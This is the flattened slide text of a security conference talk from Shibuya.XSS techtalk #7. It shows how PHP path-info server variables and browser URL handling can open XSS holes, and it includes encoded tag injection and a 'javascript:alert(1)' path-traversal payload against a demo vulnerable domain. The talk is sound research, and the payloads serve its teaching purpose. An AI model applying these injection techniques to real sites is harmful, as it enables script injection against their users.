English version of my presentation in Shibuya.XSS techtalk #7 Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-7
View Slide
FIRSTH A L F
https://host/tags/aaa/......
...content="https://host/path/index">...https://host/path/index?p=1
...content="https://host/path/index;aaa">...https://host/path/index;aaa?p=1
http://php.net/index.phphttp://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/http://shibuyaxss.connpass.com/event/28232/;abc
SCRIPT_URL /test.php/PATHSCRIPT_URI http://localhost/test.php/PATHPATH_INFO /PATHPATH_TRANSLATED \PATH<\b>PHP_SELF /test.php/PATH
GET /path?query HTTP/1.1The URI which was given in order to access this page;for instance, '/index.html'.http://php.net/manual/ja/reserved.variables.server.php
/test.php/PATH?QUERYGET/test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E HTTP/1.1QUERY_STRING %3Cb%3EQUERY%3C/b%3EREQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E
/test.php/%3Cb%3EPATH%3C/b%3E?QUERYGET /test.php/%3Cb%3EPATH%3C/b%3E?QUERYHTTP/1.1QUERY_STRING QUERYREQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?QUERY
http://localhost/test.php/PATHGET /test.php/PATH HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3EGET /test.php/PATH HTTP/1.1REQUEST_URI /test.php/PATHlocation.pathname/test.php/%3Cb%3EPATH%3C/b%3E
LATERH A L F
HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8X-UA-Compatible: IE=9
ifr=document.createElement('');document.body.appendChild(ifr);InvalidCharacterError
<br/>console.log(document.documentMode) /* 9 */<br/>
src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/%2F..%2F..%2Fjizen2#hash">
src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js">